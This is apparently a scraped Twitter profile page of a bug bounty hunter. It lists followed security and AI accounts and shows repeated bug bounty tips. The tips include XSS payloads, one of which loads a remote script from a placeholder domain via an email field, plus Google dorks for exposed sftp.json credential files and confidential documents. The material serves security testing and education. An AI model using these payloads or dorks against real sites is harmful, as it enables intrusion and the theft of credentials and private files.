Mike Takahashi @TakSec
Pentester | Bug Bounty Hunter | AI Whisperer '><embed src=javascript%26%63%6f%6c%6f%6e%3balert('TakSec')> taksec.medium.com Palo Alto, CA Joined May 2012-
Tweets2K
-
Followers19K
-
Following522
-
Likes2K
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
Happy Hunting !!!! Curated collection of powerful one-liners tailored for bug bounty hunting, crafted with ♥ by the community. Contribute and enhance your bounty hunting arsenal! ## Quick Guide - **HOST:** Refers to a single hostname, domain, or IP address. - **HOSTS.txt:**…
If you ever have difficulty reading the structure of JSON data try jsoncrack.com. Anytime I have difficulty understanding how data is nested I just copy and paste it hear to get a good visual. Thank me later 😉
@CaedusSec @CheddarB0b42 If you have a valid value for a param (i.e. some value which returns some result) like user=admin, then you can usually reliably check for some kind of SQL injection using a "break & repair" technique. First understand what the untampered value results in: user=admin Then…
How I #XSS Stuff Today => Double Stage Payload Stage 1 innerHTML=URL,outerHTML=textContent Stage 2 <Img/Src/OnError=alert(1)>k brutelogic.com.br/xss.php?a=%3CS… Stage 1, no parentheses. Stage 2 never gets sent to server, customizable. Check here for more leanpub.com/brutexss
Md Ismail Šojal @0x0SojalSec
22K Followers 4K Following Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||🇷🇴 cristi @CristiVlad25
38K Followers 151 FollowingJoseph Thacker @rez0__
49K Followers 866 Following the promptfather. christian. hacker. hobby jogger. principal ai engineer @appomnisecurity.Aditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍🇸🇦 ROOD | GOAT @0x_rood
21K Followers 299 Following Ich heiße rood | born to be bug hunter | more than 1000 bugsJason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.payloadartist @payloadartist
34K Followers 288 Following Tweeting about Application Security, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my ownAnton @therceman
20K Followers 596 Following 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💬 Sharing Bug Bounty Hunting Knowledge ℹ️ ➡️ 🎞️ https://t.co/D1MVWyjoKS 💡 https://t.co/ZsPdqy8BI6Katie Paxton-Fear @InsiderPhD
82K Followers 2K Following Dr, apparently. Creator @traceableai, Lecturer & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/herSTÖK ✌️ @stokfredrik
126K Followers 1K Following Hi.. im that hacker / creative that your friends told you about. Creative Director & Hacks all the things at @truesecHet Mehta @hetmehtaa
24K Followers 953 Following Security Analyst | Content Creator | I Spread Cyber Security & Talk about AI, Cloud, Tech, Tools & UpdatesKanhaiya Sharma @krishnsec
15K Followers 431 Following Cyber security | Top 20 P1 warrior @Bugcrowd | Top 50 globally ( https://t.co/8Fo8sBpaLl )renniepak @renniepak
10K Followers 341 Following Self-XSS connoisseur. Elite Hacker. MVH H11337UPBash. One-Percent Man. Co-Founder @HackerHideout (he/him)Farah Hawa @Farah_Hawaa
44K Followers 840 Following security analyst @fbsecurity | part-time bug hunter | content creator | she/her | views = mineRenganathan @IamRenganathan
12K Followers 678 Following 19 | Ethical Hacker | Building R Protocols | Speaker | 25+ talks | Secured Google, Apple, LinkedIn, UN, Medium & more | Tweets are personal :)Lu3ky13 ⚡️⚡️ @lu3ky13
10K Followers 728 Following ṙ̷̐̊̉̈͒̓̒̈́̐̀̓̅̂̈́̎́̉̋͌̚̚̕Security Researcher And Security Developer #CAPen #CAP #ewpt #ccna #CCSP-AWS #BS.Accounting CEO @CyberShield01⚡️⚡Clandestine @akaclandestine
35K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting |Ahsan Khan @hunter0x7
33K Followers 1K Following [Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!Viktor 🔮 @ethers_security
189 Followers 432 Following Security Researcher, Web3 enthusiast, AI, Zk, Magic lover and Auditor at Hacken. Owner of @ethers_officer, @ethers_security and @soliditypedia on TelegramTarun @tarrruunnnn
188 Followers 69 Following Virtuoso, Eclectic, Enigmatic, Truly Optimistic, Sapiosexual, Ambivert Personality, Listen to Reggaeton & Believer of Do unto Others. 😌😌Mohamud Mahmd @MMohamudd
40 Followers 527 FollowingMaria Diaz @MariaDi36155707
0 Followers 1 FollowingRomain @Romain344965
2 Followers 115 FollowingNikolaos Chrysaidos @virqdroid
6K Followers 565 Following Threat Intelligence | Cybersecurity | ML/AI | ex-@apklabio /Avast | Mobile Security & Malware Researcher Democratizing Cyber Threat Hunting & IntelligenceShu Qi @reinerjade
91 Followers 432 FollowingZiya Şefik Atun @ZiyaSefikAtun
54 Followers 881 FollowingAnjana Nair @nair_anjan
0 Followers 7 FollowingArc @arckcess400
44 Followers 167 Following Threats, Exploits,Vulnerabilities, Rootkits,Zero days,Breach. Firewall, Encryption,Patch Mgmt,2FA/MFA,IDS,SIEM,SOC,SCADA/ICS,SDRApprection @apprection
10 Followers 62 Following Apprection tomorrow morning but you know the first person who !?!?Yitz E. @YitzEinhorn
0 Followers 253 FollowingRobot .Bot @RobotBot314414
51 Followers 428 FollowingGreenBook @TheGreenStash
457 Followers 2K Following #Jebus =Showing the whole world, despite closed eyes and restricted free speech, here to learn, dispute and possibly teach, Awak3ned minds easily united&FreeAkin🐧 @th3darkkn19ht
86 Followers 67 FollowingSusaX @SusaraThen4790
1 Followers 40 Following 🔌Tech Enthusiast | 🚀Aspiring Innovator | ⌨️Code Whiz | 🌐Exploring the Digital Frontier | 🤖AI & Robotics Fanatic | 🌟Eager to Connect & Learn #FreeNFTfjeiela @fjeiela78601
13 Followers 60 FollowingEuler Neto @netonightmare
187 Followers 625 Following Just one propagandist of time; DFIR/Malware/OSINT, Death Metal, Beer, Horror Movies, Sports, Retro-gaming; My opinions, my own.Amr Salem @webstion0
3 Followers 81 FollowingColdplayesque @AlejoBSide
597 Followers 520 Following Ingeniero y artista. Artista e ingeniero. IA. AI. Inteligencia Artificial. Artificial Intelligence. That's me.Saltwells @Saltwells22147
2 Followers 62 Following모래 @morae_ishere
6 Followers 182 FollowingGu\x74\x6F @guto_yoda
76 Followers 336 Following Natural de Belém do Pará, sou o que se pode ver… ou não.Hanh Nguyen @HanhMen
24 Followers 244 FollowingSchwarz Osint @Osint_Schwarz
0 Followers 5 Following CEO of https://t.co/JKYu3hQUBR Author of https://t.co/MJOOPgUOIc Owner of https://t.co/CYfvMXne0eMuheeb S. Al-Areiqi @Muheebsaif
41 Followers 831 FollowingManuel Sancha @manuel_sancha
421 Followers 2K Following Ingeniero Industrial. Instalaciones. Ciberseguridad IndustrialDemon of internet @Demonofinternet
175 Followers 2K Following Time is valuable.. don’t waste it. I’m still learning and teaching. I make websites and cli software. #html, #css, #javascript, #python.🦾🦾. No love lost 😞.J.-P. Nijs @p_nijs
81 Followers 581 FollowingMarcO @MarcO06990608
55 Followers 1K Followingmohammed hassen (Memo.. @memomanTweet
0 Followers 52 Following A jack of all trades is a master of none BUT better than a master of one.Pablo @Pino_Tweet
4 Followers 46 FollowingMoshe Kwiat - موس�.. @mokwi8
2K Followers 2K Following Hybrid warfare, influence operations, #OSINT, cyber. Graduate researcher @idclauderschool. Capt. (res.) IDF. #HTTC on Sundays. RT/like ≠ endorsement.Christiaan Beek @ChristiaanBeek
10K Followers 2K Following Saved by His Grace • sr dir Threat Analytics @Rapid7 - opinions are my own• Speaker•Former @Foundstone @Intel @Kon_MarineIntigriti @intigriti
155K Followers 644 Following Global Bug Bounty & VDP Platform. 🌐: https://t.co/fgCupJckrW ▶️: https://t.co/lRfCzZBgb7 👾: https://t.co/Inf7N9VQIlAbhishek Meena - {�.. @RadhaSec
31K Followers 230 Following COO at @Vulncure | 🖊️ Tester | 🪲 Hunter HOF - Google 🤝 Sharing Knowledge with infosec community 📬 Inbox Whenever Need HelpBen Sadeghipour @NahamSec
197K Followers 1K Following Cofounder @hackinghub_io, Advisor @Trick3st @CaidoIO. I hack companies and make content about it. Bug Bounty Village & #NahamCon organizer. ex @hacker0x01🇮🇷Md Ismail Šojal @0x0SojalSec
22K Followers 4K Following Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis / incident Response II Pwn || GH0ST_3xP10iT || 0ld Accounts Suspended @0xSojalSec ||bugcrowd @Bugcrowd
161K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™🇷🇴 cristi @CristiVlad25
38K Followers 151 FollowingJoseph Thacker @rez0__
49K Followers 866 Following the promptfather. christian. hacker. hobby jogger. principal ai engineer @appomnisecurity.Aditya Shende @ADITYASHENDE17
51K Followers 421 Following MS Cyber 🇬🇧 | Bugcrowd Top 100 | Overseas Pentest Trainer | Keynote Speaker | Professional Biker | 🌎 @kong_sec 🦍Lohitaksh Nandan @NandanLohitaksh
42K Followers 4 Following If opportunity doesn't knock, build a door!!InfoSec Community @InfoSecComm
38K Followers 637 Following Largest InfoSec publication with 30k+ followers and 1M+ monthly views. 3rd edition of @IWcon_ happening in December 2023!Corben Leo @hacker_
68K Followers 659 Following I hack stuff (legally) | Jesus follower | Co-founder @boringmattressSam Curry @samwcyo
77K Followers 945 Following Hacker, bug bounty hunter. Run a blog to better explain web application security.Jason Haddix @Jhaddix
146K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. @arcanuminfosec 18 years hacking + sec leadership. ex:BuddoBot-Ubisoft-Bugcrowd-Fortify-HP-Redspin-Citrix.payloadartist @payloadartist
34K Followers 288 Following Tweeting about Application Security, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my ownAnton @therceman
20K Followers 596 Following 👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💬 Sharing Bug Bounty Hunting Knowledge ℹ️ ➡️ 🎞️ https://t.co/D1MVWyjoKS 💡 https://t.co/ZsPdqy8BI6Katie Paxton-Fear @InsiderPhD
82K Followers 2K Following Dr, apparently. Creator @traceableai, Lecturer & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/herhakluke @hakluke
88K Followers 2K Following Hacker, bounties, entrepreneur. I help cybersecurity companies produce amazing content for their blogs and socials. Founder of: @haksecio and @hacker_contentHussein Daher @HusseiN98D
43K Followers 151 Following Entrepreneur, Hacker 🇱🇧🇨🇮 @WebImmunify 27th/270000 BugCrowd Hacking PlatformExtropic @Extropic_AI
29K Followers 28 Following ... . .-.. ..-. -....- .- ... ... . -- -... .-.. .. -. --. / .. -. - . .-.. .-.. .. --. . -. -.-. . / ..-. .-. --- -- / - .... . / ..-. ..- - ..- .-. .AI at Meta @AIatMeta
531K Followers 255 Following Together with the AI community, we are pushing the boundaries of what’s possible through open science to create a more connected world.Beff Jezos — e/acc .. @BasedBeffJezos
102K Followers 2K Following chief accelerator & founder @ e/acc // thermodynamic priest // Kardashev gradient climber // memetic warlord // building @extropic_aipry0cc // Ben Bidmead @pry0cc
31K Followers 1K Following Pentester for 5 yrs - that dude who invented axiom - now Bug Bounty Triage lead @ AWS 🤓 e/accph0r3nsic 🕷️ �.. @ph0r3nsic
384 Followers 680 Following Christian || Brazilian || Red-Team || Part-time Bug HunterWeGPT.ai | Prompting .. @WeGPTai
2K Followers 38 Following Connecting your LLM to the real-time world with WebGPT🤖. Your AI software engineering assistant that builds right in your chat. #AITeknium (e/λ) @Teknium1
29K Followers 3K Following Cofounder @NousResearch, prev @StabilityAI Github: https://t.co/LZwHTUFwPq HuggingFace: https://t.co/sN2FFU8PVE Support me on Github Sponsorserrør404 @hugopicanzo
3K Followers 3K Following Offensive Security - "Practice harder, work harder. Don’t ever make excuses for yourself."Alex Reibman 🖇️ @AlexReibman
23K Followers 803 Following Accelerating @agentopsai @foomvc Agents, ML, math, and data viz. Hack reporter🕶️udio @udiomusic
28K Followers 0 Followingmeg west @cybersecmeg
137K Followers 1K Following #CISSP | #CCSP | MSc #Cybersecurity | Sr. Cybersecurity Consultant @CrowdStrike | Tweets about #dogs & travel & APTs, oh my! | Opinions are my own.Tib3rius @0xTib3rius
57K Followers 444 Following Web App (mostly) Hacker | OnlyFeet Member | Cybersecurity Educator | AutoRecon Dev | Ex-Brit | Links: https://t.co/04RRExvxXj (he/him) 🇺🇸Pacific Hackers Confe.. @PHackCon
466 Followers 147 Following Pacific Hackers Infosec Conference https://t.co/kcyOcHcwSb https://t.co/05ANJwl9iXSP3C7RA @sp3c7r4_gee
207 Followers 649 Following Cyber security expert 👩💻, Bug bounty Hunter 🔍, Programmer🖱️ #whoami root_sp3c7r4Darknet Diaries @DarknetDiaries
120K Followers 1 Following True stories from the dark side of the Internet. Host @jackrhysider. New episodes released on the first Tuesday of each month. Discord: https://t.co/bZZRR8C59RNomic AI @nomic_ai
14K Followers 50 Following Building explainable and accessible AI https://t.co/bbYqCdL8vQOpenwall @Openwall
7K Followers 10 Following Infosec focused free software, research, publications, community activities @oss_security. Tweets are announcements. Please direct questions to @solardiz.Matan Berson @MtnBer
956 Followers 198 Following Hacking for fun | H1-65 Eliminator award | AWC23 Best New HackerHELLDIVERS™ 2 @helldivers2
603K Followers 9 Following HELLDIVERS 2 developed by @ArrowheadGS on PS5 and PC! GIVE 'EM HELL. JOIN THE FIGHT: https://t.co/8XngCajWtvMateo Hanžek @h4nsmach1ne
89 Followers 93 Following Professional hacker by day, security researcher by night.Kanhaiya Sharma @krishnsec
15K Followers 431 Following Cyber security | Top 20 P1 warrior @Bugcrowd | Top 50 globally ( https://t.co/8Fo8sBpaLl )Shreyas Chavhan @shreyas_chavhan
2K Followers 288 Following Hacker | Secured Microsoft, OpenSea & more | Slaying Bugs Full Time with My Nichirin Sword (aka Burp) since Aug 2023 | Analytical Psychology Enthusiast - Ni DomRobert Hansen @RSnake
35K Followers 1K Following Managing Director - Grossman Ventures. Security executive, defender of others' privacy, Author of AI’s Best Friend, Advisor, often found joking.Supr4s @LdrTom
1K Followers 652 Following Open-source enthusiasts, System administrator and Bug Bounty Hunter on @Hacker0x01 @yeswehack (Top 20)Varun Bhat @evils0cket
190 Followers 2K FollowingT @0xTony
304 Followers 198 Following Catholic, Husband, Dad, Hacker, Packet Hacking Village I do security stuff at places...Ming Chow @0xmchow@in.. @0xmchow
8K Followers 455 Following Hacker of the old-school variety. Associate Teaching Professor at Tufts University. Likes the simple life. My views are mine alone. #GGMUElevenLabs @elevenlabsio
65K Followers 11 Following Research lab exploring new frontiers of Voice AI. Building tools for long-form speech synthesis, voice cloning and dubbing.Ron Masas @RonMasas
1K Followers 197 Following trying to predict the next token to make you think i’m a security researcher.HackTricks @hacktricks_live
12K Followers 198 Following HackTricks is a project which aims to offer free quality hacking resources to all the world, so people can learn for free the latest techniques in cybersecurityJayesh Madnani @Jayesh25_
11K Followers 354 Following CEO and Hacker in charge @ EIS | HackerOne Top 15 | https://t.co/JSX03WutFNIWCON - The Infosec W.. @IWcon_
610 Followers 3 Following Official page for @infoseccomm's #IWCON2023 - the internet's most-awaited security conference. Connect with the who's who of cybersecurity on 16-17 Dec 2023Hacking Articles @hackinarticles
224K Followers 402 Following House of Pentesters Follow us: https://t.co/Y6XOlSOA92Andrew Hutz @TheGreenAbyss
606 Followers 481 Following Cybersecurity engineer and published author. I play with computers. #hacker, #coder, and sometimes writes TGA Security blog. A+, Sec+, BICCPTRahav Rosenberg @Rahavon
305 Followers 524 Following Dad • Husband • IT Professional, Hardware and Tech Enthusiast • Huge Pro Wrestling Fan • From The Bay Area, California •Ken Gannon @Yogehi
583 Followers 208 Following 95% random tweets, 5% security related tweets, Pwn2Own 2023, Principal Security Consultant @NCCsecurityUSEvan Morikawa @E0M
13K Followers 1K Following Manage eng at @openai. Building GPT-4, ChatGPT, DALL·E, Codex, & GPT-3 APIs. Prev: Dir Eng @Nylas, Co-Founder @Proximate, @OlinCollege alum.xssdoctor @xssdoctor
908 Followers 326 Following hacker and cardiologist… not necessarily in that orderAnthropic @AnthropicAI
262K Followers 26 Following We're an AI safety and research company that builds reliable, interpretable, and steerable AI systems. Talk to our AI assistant Claude at https://t.co/aRbQ97uk4d.HackerGPT @thehackergpt
8K Followers 0 Following #1 Trusted ethical hacking AI for web and network hacking.Ahmed Aboul-Ela @aboul3la
6K Followers 636 Following Infosec Geek. Security Researcher, CTFer with @BalalaikaCr3w / LC↯BCProxyman @proxyman_app
5K Followers 5K Following 🍎 Modern. Native. Web Debugging Proxy for macOS, Windows & iOS ⚡️ Capture & Decrypt HTTP(s) like a Pro. 🚀 Support iOS and Android (Device and Simulators)Johann Rehberger @wunderwuzzi23
3K Followers 628 Following Hacking neural networks so that we don’t get stuck in the matrix. Red Team Director @ Electronic Arts. Entrepreneur. Builder and Breaker. Opinions are my own.XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
Files Containing Juicy Info inurl:"/.vscode/sftp.json" #bugbounty #bugbountytips #bugbountytip #cybersecurity #ethicalhacking
Happy Hunting !!!! Curated collection of powerful one-liners tailored for bug bounty hunting, crafted with ♥ by the community. Contribute and enhance your bounty hunting arsenal! ## Quick Guide - **HOST:** Refers to a single hostname, domain, or IP address. - **HOSTS.txt:**…
If you ever have difficulty reading the structure of JSON data try jsoncrack.com. Anytime I have difficulty understanding how data is nested I just copy and paste it hear to get a good visual. Thank me later 😉
One of the best Twitter accounts about Google Dorks is @TakSec. You can use it to learn how to search Google for: - server errors - sensitive documents - login pages - API endpoints - unlisted bug bounty programms and more.
we open sourced our chat interface. github.com/cohere-ai/cohe…
People were paying me from $3K to $10K to build their website. In some cases it took no more than 7 days to get it done. 🫣 Now that I’m not working with clients anymore, I can stop gatekeeping 😅 Here’s some tools to save you lots of money/time:
🛠️ Armory Repo of hundreds of free detections across Okta, AWS, endpoint, network, web, and more By @WeAreAnvilogic #cybersecurity #blueteam github.com/anvilogic-forg…
Introducing the Instruction Hierarchy, our latest safety research to advance robustness for prompt injections and other ways of tricking LLMs into executing unsafe actions. More details: arxiv.org/abs/2404.13208
@CaedusSec @CheddarB0b42 If you have a valid value for a param (i.e. some value which returns some result) like user=admin, then you can usually reliably check for some kind of SQL injection using a "break & repair" technique. First understand what the untampered value results in: user=admin Then…
@TakSec Damn, nice. Makes it so much easier. Thanks!
I used a similar technique to access files I definitely shouldn’t have accessed ~10 years ago, before I know what cybersecurity was. Glad to see people are finally discovering these methods and talking about them.
Google Dork - Sensitive Docs 📄 ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” Discover internal files 👀
How I #XSS Stuff Today => Double Stage Payload Stage 1 innerHTML=URL,outerHTML=textContent Stage 2 <Img/Src/OnError=alert(1)>k brutelogic.com.br/xss.php?a=%3CS… Stage 1, no parentheses. Stage 2 never gets sent to server, customizable. Check here for more leanpub.com/brutexss